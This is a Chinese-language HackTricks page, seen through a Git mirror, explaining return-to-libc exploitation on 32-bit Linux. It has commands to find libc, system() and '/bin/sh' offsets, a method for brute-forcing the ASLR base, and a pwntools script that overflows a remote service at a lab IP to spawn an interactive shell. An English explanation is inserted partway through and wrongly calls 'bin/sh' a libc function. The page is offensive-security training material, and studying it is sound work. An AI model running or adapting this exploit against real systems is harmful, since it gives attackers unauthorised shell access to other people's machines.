Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md

108 lines
5.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
其他支持HackTricks的方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
**如果您找到了一个有漏洞的二进制文件并且认为可以利用Ret2Lib进行利用这里有一些基本步骤供您参考。**
# 如果您在**主机内**
## 您可以找到**libc库的地址**
```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
```
如果您想检查ASLR是否更改了libc的地址可以执行以下操作
```bash
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
```
## 获取system函数的偏移量
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
## 获取 "/bin/sh" 的偏移量
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
## /proc/\<PID>/maps
如果进程每次与其通信时都会创建**子进程**(网络服务器),尝试**读取**该文件可能需要使用root权限
在这里,您可以找到进程内**libc加载的确切位置**以及**每个子进程将要加载的位置**。
![](<../../.gitbook/assets/image (95).png>)
在这种情况下,它加载在**0xb75dc000**这将是libc的基址
## 使用gdb-peda
使用gdb-peda获取**system**函数、**exit**函数和字符串**"/bin/sh"**的地址:
```
p system
p exit
find "/bin/sh"
```
# 绕过ASLR
您可以尝试对libc的基址进行暴力破解。
```python
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
# 代码
## Ret2Lib
### Introduction
In this section, we will cover the basics of Return-to-libc (Ret2Lib) attacks. These attacks are a variation of Return Oriented Programming (ROP) attacks, where instead of chaining together small code snippets (gadgets) already present in the program, we chain together function calls from the standard C library (`libc`). This technique is useful when Data Execution Prevention (DEP) is enabled, preventing the execution of code on the stack.
### Steps
1. **Find `libc` Address**: The first step is to find the address of the `libc` library in the program's memory space. This can be done by leaking addresses or using techniques like Partial Overwrite.
2. **Find Function Addresses**: Next, we need to find the addresses of the functions we want to call from `libc`. Common functions used in Ret2Lib attacks include `system`, `execve`, `bin/sh`, etc.
3. **Craft Payload**: Craft a payload that chains together the addresses of the functions in `libc` that you want to call. This payload will overwrite the return address on the stack with the address of the first function to call.
4. **Exploit**: Finally, trigger the vulnerability in the program to execute the crafted payload. This will lead to the execution of the functions from `libc` as part of the attack.
### Conclusion
Return-to-libc attacks are a powerful technique to bypass DEP and execute code from the `libc` library. By chaining together function calls, attackers can achieve their malicious goals without needing to inject code into the program's memory space.
```python
from pwn import *
c = remote('192.168.85.181',20002)
c.recvline() #Banner
for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
```
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
Reference in a new issue View git blame Copy permalink